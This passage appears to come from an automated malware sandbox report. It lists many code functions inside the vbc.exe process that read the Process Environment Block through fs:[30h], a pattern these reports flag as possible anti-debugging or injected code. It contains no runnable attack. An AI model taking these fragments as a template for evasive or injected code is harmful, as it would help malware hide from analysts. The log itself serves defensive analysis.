          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7273C mov ecx, dword ptr fs:[00000030h]6_2_05C7273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7273C mov eax, dword ptr fs:[00000030h]6_2_05C7273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A6C7 mov ebx, dword ptr fs:[00000030h]6_2_05C7A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A6C7 mov eax, dword ptr fs:[00000030h]6_2_05C7A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC06F1 mov eax, dword ptr fs:[00000030h]6_2_05CC06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC06F1 mov eax, dword ptr fs:[00000030h]6_2_05CC06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44690 mov eax, dword ptr fs:[00000030h]6_2_05C44690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44690 mov eax, dword ptr fs:[00000030h]6_2_05C44690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C6A6 mov eax, dword ptr fs:[00000030h]6_2_05C7C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C766B0 mov eax, dword ptr fs:[00000030h]6_2_05C766B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5C640 mov eax, dword ptr fs:[00000030h]6_2_05C5C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A660 mov eax, dword ptr fs:[00000030h]6_2_05C7A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A660 mov eax, dword ptr fs:[00000030h]6_2_05C7A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72674 mov eax, dword ptr fs:[00000030h]6_2_05C72674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0866E mov eax, dword ptr fs:[00000030h]6_2_05D0866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0866E mov eax, dword ptr fs:[00000030h]6_2_05D0866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE609 mov eax, dword ptr fs:[00000030h]6_2_05CBE609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82619 mov eax, dword ptr fs:[00000030h]6_2_05C82619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E627 mov eax, dword ptr fs:[00000030h]6_2_05C5E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C76620 mov eax, dword ptr fs:[00000030h]6_2_05C76620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C78620 mov eax, dword ptr fs:[00000030h]6_2_05C78620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4262C mov eax, dword ptr fs:[00000030h]6_2_05C4262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D061C3 mov eax, dword ptr fs:[00000030h]6_2_05D061C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D061C3 mov eax, dword ptr fs:[00000030h]6_2_05D061C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov ecx, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D161E5 mov eax, dword ptr fs:[00000030h]6_2_05D161E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C701F8 mov eax, dword ptr fs:[00000030h]6_2_05C701F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFC188 mov eax, dword ptr fs:[00000030h]6_2_05CFC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFC188 mov eax, dword ptr fs:[00000030h]6_2_05CFC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C80185 mov eax, dword ptr fs:[00000030h]6_2_05C80185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4180 mov eax, dword ptr fs:[00000030h]6_2_05CE4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4180 mov eax, dword ptr fs:[00000030h]6_2_05CE4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A197 mov eax, dword ptr fs:[00000030h]6_2_05C3A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A197 mov eax, dword ptr fs:[00000030h]6_2_05C3A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A197 mov eax, dword ptr fs:[00000030h]6_2_05C3A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov ecx, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46154 mov eax, dword ptr fs:[00000030h]6_2_05C46154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46154 mov eax, dword ptr fs:[00000030h]6_2_05C46154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C156 mov eax, dword ptr fs:[00000030h]6_2_05C3C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD8158 mov eax, dword ptr fs:[00000030h]6_2_05CD8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14164 mov eax, dword ptr fs:[00000030h]6_2_05D14164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14164 mov eax, dword ptr fs:[00000030h]6_2_05D14164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D00115 mov eax, dword ptr fs:[00000030h]6_2_05D00115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov ecx, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov eax, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov eax, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov eax, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C70124 mov eax, dword ptr fs:[00000030h]6_2_05C70124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC20DE mov eax, dword ptr fs:[00000030h]6_2_05CC20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A0E3 mov ecx, dword ptr fs:[00000030h]6_2_05C3A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC60E0 mov eax, dword ptr fs:[00000030h]6_2_05CC60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C480E9 mov eax, dword ptr fs:[00000030h]6_2_05C480E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C0F0 mov eax, dword ptr fs:[00000030h]6_2_05C3C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C820F0 mov ecx, dword ptr fs:[00000030h]6_2_05C820F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4208A mov eax, dword ptr fs:[00000030h]6_2_05C4208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C380A0 mov eax, dword ptr fs:[00000030h]6_2_05C380A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD80A8 mov eax, dword ptr fs:[00000030h]6_2_05CD80A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D060B8 mov eax, dword ptr fs:[00000030h]6_2_05D060B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D060B8 mov ecx, dword ptr fs:[00000030h]6_2_05D060B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42050 mov eax, dword ptr fs:[00000030h]6_2_05C42050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6050 mov eax, dword ptr fs:[00000030h]6_2_05CC6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6C073 mov eax, dword ptr fs:[00000030h]6_2_05C6C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4000 mov ecx, dword ptr fs:[00000030h]6_2_05CC4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A020 mov eax, dword ptr fs:[00000030h]6_2_05C3A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C020 mov eax, dword ptr fs:[00000030h]6_2_05C3C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD6030 mov eax, dword ptr fs:[00000030h]6_2_05CD6030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFC3CD mov eax, dword ptr fs:[00000030h]6_2_05CFC3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC63C0 mov eax, dword ptr fs:[00000030h]6_2_05CC63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov eax, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov eax, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov ecx, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov eax, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE43D4 mov eax, dword ptr fs:[00000030h]6_2_05CE43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE43D4 mov eax, dword ptr fs:[00000030h]6_2_05CE43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F0 mov eax, dword ptr fs:[00000030h]6_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F0 mov eax, dword ptr fs:[00000030h]6_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F0 mov eax, dword ptr fs:[00000030h]6_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C763FF mov eax, dword ptr fs:[00000030h]6_2_05C763FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6438F mov eax, dword ptr fs:[00000030h]6_2_05C6438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6438F mov eax, dword ptr fs:[00000030h]6_2_05C6438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E388 mov eax, dword ptr fs:[00000030h]6_2_05C3E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E388 mov eax, dword ptr fs:[00000030h]6_2_05C3E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E388 mov eax, dword ptr fs:[00000030h]6_2_05C3E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38397 mov eax, dword ptr fs:[00000030h]6_2_05C38397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38397 mov eax, dword ptr fs:[00000030h]6_2_05C38397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38397 mov eax, dword ptr fs:[00000030h]6_2_05C38397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0A352 mov eax, dword ptr fs:[00000030h]6_2_05D0A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h] (12 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC035C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE8350 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D1634F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE437C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3C310 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C60310 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C4A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D162D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C502E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C502A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CD62A0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D1625D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC8243 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC8243 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3A250 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C46259 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CFA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C44260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3826B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3823B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C6EDD3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
